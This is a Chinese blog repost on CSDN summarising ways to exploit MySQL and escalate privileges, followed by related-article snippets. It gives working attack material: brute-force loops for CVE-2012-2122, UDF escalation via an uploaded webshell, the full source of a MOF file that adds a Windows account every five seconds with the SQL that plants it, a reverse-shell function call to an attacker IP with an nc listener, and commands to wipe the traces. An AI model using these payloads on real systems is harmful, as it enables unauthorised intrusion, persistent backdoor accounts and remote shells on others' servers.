mysql数据库提权_mysql数据库漏洞利用及提权方式小结

最新推荐文章于 2024-04-18 03:28:15 发布
最新推荐文章于 2024-04-18 03:28:15 发布
阅读量377 收藏 1
点赞数
文章标签: mysql数据库提权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_30341445/article/details/113336775
版权

CVE-2012-2122 Mysql身份认证漏洞

影响版本

Mysql在5.5.24之前

MariaDB也差不多这个版本之前

漏洞原理

只要知道用户名,不断尝试就能够直接登入SQL数据库,按照公告说法大约256次就能够蒙对一次

漏洞复现

msf利用

17df4f239af3ebef7b605f592a6dd3b9.png

hash解密

456c5324853bde1d73efe6d00958ed77.png

得到密码即可登录

445aee414b3287c5195bebc2ed13b6ac.png

python exp

#!/usr/bin/python

import subprocess

while 1:

subprocess.Popen("mysql -u root -p -h 192.168.0.16 --password=test", shell=True).wait()

882c022e7c0f6c883d663b9db662d17d.png

shell exp

for i in `seq 1 1000`; do mysql -u root -p -h 192.168.0.16 --password=bad 2>/dev/null; done

f85f30f8ebafc74f81ecdb6475d1fce7.png

Mysql UDF提权

如果mysql版本大于5.1,udf.dll文件必须放置在mysql安装目录的lib\plugin文件夹下

如果mysql版本小于5.1,udf.dll文件在windows server 2003下放置于c:\windows\system32目录,在windows server 2000下放置在c:\winnt\system32目录

利用sqlmap进行UDF提权

eac7276a2cace243b170928f295f051f.png

利用msf进行UDF提权

使用mysql_udf_payload模块

适应于5.5.9以下,我这边的mysql版本号为5.5.53,已经超出了版本限制,所以不能提权

手工UDF提权

这里上传使用暗月的木马

b641d52a4c0fabc90c25336304e9ef13.png

这作者牛逼牛逼

登录进去,它会自动判断mysql版本决定出导出dll文件位置

96f42b1117262845510b5b15d646ab5f.png

然后导出udf,发现没有plugin这个目录

d0ee882577e68cbe6d3c3a9a9b2da126.png

于是我们创建后就能成功导出

fd07595f85c0ffd3e987fc5b84c4bc3f.png

但是一直找不到文件。。,

最后使用其它的udf提权文件发现可以,原来是这个udf文件问题,这下便能执行命令

d7ca9d55592bda19f26053eaf9762736.png

添加管理员,开启3389等。。这里就略过

既然知道了mysql账号密码当然也可以直接连接上去,然后上传文件,执行命令

Mysql MOF提权

直接上传文件MOF提权

直接上传mof.php文件登录后执行任意命令

5b4b0bc65b50aec6836ebf6de1d0ec5b.png

a2f364ed5cefccddec8425c9f437708e.png

利用msf进行MOF提权

使用mysql_mof模块,有的版本不能成功,比如我现在这个phpstudy搭建的5.5.53

上传nullevt.mof文件进行MOF提权

nullevt.mof文件源码

#pragma namespace("\\\\.\\root\\subscription")

instance of __EventFilter as $EventFilter

{

EventNamespace = "Root\\Cimv2";

Name = "filtP2";

Query = "Select * From __InstanceModificationEvent "

"Where TargetInstance Isa \"Win32_LocalTime\" "

"And TargetInstance.Second = 5";

QueryLanguage = "WQL";

};

instance of ActiveScriptEventConsumer as $Consumer

{

Name = "consPCSV2";

ScriptingEngine = "JScript";

ScriptText =

"var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user ghtwf011 ghtwf01 /add\")";

};

instance of __FilterToConsumerBinding

{

Consumer = $Consumer;

Filter = $EventFilter;

};

他会每五秒创建一个账户ghtwf011,里面命令可以自定义

使用sql语句将文件导入到c:/windows/system32/wbem/mof/下

select load_file("C:/phpstudy/WWW/nullevt.mof") into dumpfile "c:/windows/system32/wbem/mof/nullevt.mof"

注意这里不能使用outfile,因为会在末端写入新行,因此mof在被当作二进制文件无法正常执行,所以我们用dumpfile导出一行数据

0f1d9b3b92d83737a930ca852c64dad3.png

成功生成了ghtwf011账户

67f91353a7d8304ffff01f394aa71309.png

因为每五秒都会生成账户,痕迹清理的时候使用如下办法即可

net stop winmgmt

net user ghtwf011 /delete

切换到c:/windows/system32/wbem后del repository

net start winmgmt

Mysql反弹端口提权

原理就是声明一个backdoor函数

exp如下,exp太长了文章发不出来。。我附件出来吧

第二条定义的@a是udf.dll内容的16进制

依次执行命令

kali使用nc监听,这边执行select backshell("192.168.0.12",4444);

464842b8d4f6fe20edf4598b576b995c.png

dc8dfd7f8f291936964aefda3694fb7e.png

成功提权拿到shell

参考链接

叶飞影
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
《安天365安全研究》-2017-04.pdf
08-07
2.5.9.MSSQL 数据库直接 2.5.10.使用 lcx 穿透进入内网 2.5.11.查看和扫描内网 2.5.12.利用已有信息进行渗透 2.5.13.目录信息泄露防范 2.6Acesss 数据库手工绕过通用代码防注入系统 2.6.1 获取目标信息 2.6.2 ...
Oracle数据库漏洞防护:守护企业数据安全的指南
最新发布
qq_44103359的博客
04-27 417
Oracle数据库漏洞是指Oracle数据库软件中的安全缺陷,这些缺陷可能导致数据库被未授访问、数据泄露、系统破坏等风险。SQL注入漏洞:攻击者通过SQL注入攻击,可以执行恶意SQL语句,获取或修改数据库中的数据。漏洞:攻击者利用数据库中的漏洞,获取更高的限,进而控制系统。配置错误漏洞:由于配置不当,如弱口令、未加密的数据传输等,可能导致数据库被未授访问。未授访问漏洞数据库存在未授访问漏洞,攻击者可以绕过认证机制,直接访问数据库
Windows最最最常见的几种方法
2301_80115097的博客
12-12 641
Windows SMB 服务器特漏洞(CVE漏洞编号:CVE-2016-3225)当攻击者转发适用于在同一计算机上运行的其他服务的身份验证请求时,Microsoft 服务器消息块 (SMB) 中存在特漏洞,成功利用漏洞的攻击者可以使用升的特执行任意代码。高自己在服务器中的限,主要针对网站渗透过程中,当渗透某一网站时,通过各种漏洞升WEBSHELL限以夺得该服务器限,通常是把普通用户的升到管理员限或者系统限。要利用漏洞,攻击者首先必须登录到系统。
mysql总结(自学),面试题解析已整理成文档
2401_83946070的博客
04-18 606
检测数据库的存在(探测端口)获取到数据库限密码查看数据库的类型分类读取网站的配置文件读取数据库备份文件下的库中的表的信息,例如MySQL数据库mysql_user表中存储账户密码,使用cmd5-mysql5解码暴力破解账户密码,需要支持外联(mysql默认不支持)。可以使用密码脚本在本地爆破,也可以使用工具如msf的scanner mysql_login模块MySQL数据库方式主要有三种使用sqlmap的–os-shell。
MySQL/条件竞争漏洞分析和利用(37)
yyj1781572的博客
04-30 1353
通过本实验,能够掌握MySQL/条件竞争漏洞的原理,并能够复现该漏洞,以及掌握该漏洞的修复方法。
mysql udf_mysql数据库漏洞利用方式小结
weixin_39971435的博客
12-05 688
转先知社区作者:ghtwf01CVE-2012-2122 Mysql身份认证漏洞影响版本Mysql在5.5.24之前MariaDB也差不多这个版本之前漏洞原理只要知道用户名,不断尝试就能够直接登入SQL数据库,按照公告说法大约256次就能够蒙对一次漏洞复现msf利用hash解密得到密码即可登录python exp#!/usr/bin/pythonimport subprocesswhi...
mysql漏洞利用
willow_liang的博客
04-22 2271
目录 一 、Mysql信息收集 1.使用Nmap进行mysql的信息收集 2.通过msf探测mysql信息 3.使用sqlmap进行sql注入收集mysql版本信息 二、获取mysql密码 1.使用msf模块爆破 2.nmap脚本进行爆破 3.sqlmap的sql-shell查询哈希值 4.从网站泄露的源代码中查找配置文件获取用户名密码 三、通过Mysql向服务器写shell 1.利用联合注入写入shell 2.当sql注入为盲注或者报错注入时,可以使用分隔符写入shell 3.当
Web安全深度剖析(张柄帅)
07-25
《Web安全深度剖析》总结了当前流行的高危漏洞的形成原因、攻击手段及解决方案,并通过大量的示例代码复现漏洞原型,制作模拟环境,更好地帮助读者深入了解Web应用程序中存在的漏洞,防患于未然。 《Web安全深度剖析...
SQL注入攻击与防御(安全技术经典译丛)
02-19
 1.5 本章小结  1.6 快速解决方案  1.7 常见问题解答 第2章 SQL注入测试  2.1 概述  2.2 寻找SQL注入  2.2.1 借助推理进行测试  2.2.2 数据库错误  2.2.3 应用响应  2.2.4 SQL盲注  2.3 确认SQL...
java编程手册阿里巴巴.pdf
06-11
角,划分为编程规约、异常日志、单元测试、安全规约、MySQL 数据库、工程结构、设 计规约七个维度,再根据内容特征,细分成若干二级子目录。根据约束力强弱及故障 敏感性,规约依次分为强制、推荐、参考三大类。对于...
Windows-MySQL
qq_43381463的博客
03-09 92
UDF MOF
Mysql方法总结系列-UDF
kracer的博客
02-27 2527
0x01 简介 UDF(user-defined function)是MySQL的一个拓展接口,也可称之为用户自定义函数,它是用来拓展MySQL的技术手段,可以说是数据库功能的一种扩展,用户通过自定义函数来实现MySQL中无法方便实现的功能,其添加的新函数都可以在SQL语句中调用,就像本机函数如ABS()或SOUNDEX()一样方便。UDF官方介绍以及其函数定义请参考链接。 0x01 当获取到mysql的root限,需要进行升,可以尝试使用udf。 1、条件判断 ① ...
mysql 5.7.11_CVE-2020-11107漏洞复现:利用漏洞可以实现非特用户
weixin_30620431的博客
01-19 839
知名建站软件集成包XAMPP于今年4月发布了新版本,该更新修复了CVE-2020-11107中的漏洞。在低于7.2.29、7.3.16、7.4.4的XAMPP Windows版本中,用户可以利用漏洞实现任意命令执行。目前此问题不会对Linux和OS X系统造成影响。1. XAMPP简介XAMPP是Apache Friends开发的免费开源跨平台Web建站集成软件包,其原名为LAMPP,后为避免误...
凝思6.0.80下mysql疑难杂症1
dcmilan的专栏
12-01 1476
先说背景 我的程序安装脚本会自动部署mysql5.5的generic到系统,并设置好服务脚本,然后启动mysql开始初始化数据库 这个安装包我是移交给专职负责装机的同事 最近现场经常反映,mysql数据库无法启动 问题排查流程: 1.查文件全不全,/etc/my.cnf正确,/etc/init.d/mysql存在 2.systemctl status mysql显示服务启动 3.mysql登录报错 4.查linx.pid也就是mysql服务启动后会创建一个含有进程pid的文件,该文件不存在
mysql 5.5 ,mysql之udf
weixin_32085599的博客
03-17 334
弄了两三天的UDF复现,遇到各种坑,也尝试了在实际渗透场景中的应用,所以总结了部分经验。此篇文章主要涉及mysql数据库中udf的讲解、以及UDF可能涉及的问题。--目录结构--原理讲解0x00何谓UDF0x02 UDF步骤UDF(user defined function,即’用户自定义函数’),是mysql数据库的一个特性,允许用户写入自定义函数,对mysql功能进行扩充。...
mysql安全补丁,Oracle发布了本季安全补丁,包含了mysql在内的高危漏洞补丁
weixin_29446845的博客
03-18 1647
mysql 5.1.61 和mysql 5.5.21之前的版本都受影响,以下列出关于mysql的信息Oracle MySQL Executive SummaryThis Critical Patch Update contains 6 new security fixes for Oracle MySQL. None of these vulnerabilities may be remotel...
mysql(linux)远程数据库漏洞_MySQL(Linux)远程数据库漏洞
weixin_36050664的博客
02-07 247
小编的话:Kingcope神牛又放干货了。漏洞在12月1日的Seclist上发布,作者在Debian Lenny (mysql-5.0.51a) 、 OpenSuSE 11.4 (5.1.53-log)上测试成功,代码执行成功后会增加一个MySQL的管理员帐号。use DBI();$|=1;=for commentMySQL privilege elevation ExploitThis expl...
MySQL数据库渗透及漏洞利用总结
05-09 4086
Mysql数据库是目前世界上使用最为广泛的数据库之一,很多著名公司和站点都使用Mysql作为其数据库支撑,目前很多架构都以Mysql作为数据库管理系统,例如LAMP、和W...
Linux—服务漏洞,以MySQL-UDF为例,2024年最新2024-2024阿里巴巴网络安全面试真题解析
2301_77118221的博客
04-15 250
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!最后给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!对于从来没有接触过网络安全的同学,我们帮你准备了详细的。资源较为敏感,未展示全面,需要的最下面获取。,大家跟着这个大的方向学习准没问题。
mysql数据库
09-05
要进行MySQL,需要满足以下条件: 1. 服务器已安装MySQL数据库,并且MySQL的服务没有降。 2. 具有MySQL的root限,并且MySQL以system限运行。 3. 具有执行SQL语句的限。 要进行MySQL,可以按照以下...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值